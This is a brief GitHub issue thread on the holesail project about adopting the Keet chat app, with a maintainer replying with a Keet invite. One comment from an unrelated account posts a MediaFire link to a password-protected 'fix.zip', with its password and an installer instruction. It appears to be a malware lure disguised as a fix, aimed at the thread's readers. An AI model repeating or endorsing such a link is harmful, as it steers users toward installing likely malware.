### ISSUE TITLE
consider using keet!

### ISSUE THREAD

**Issue by Steampowered-hippo** [holesail/holesail#14]
Hi there,
I'd like to make a suggestion: As discord and also reddit are neither save nor censorship resistant, you should consider to use keet as a new way of communication. It uses the pear framework as you do. ;o)

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by supersuryaansh** [comment]
@Steampowered-hippo Yes we are on Keet:
Join me on Keet.io - Holesail.io (invite expires on 2024/09/09 11:17 UTC)

pear://keet/yrbtmo86zx535piujendiqx98otq654jgfarfsmmxzwi1ozx44s8cbm4pmiakkpksq6mjod8otqtj3jyut3ppxgg3idzcryqneekhrhhnpg7uzug
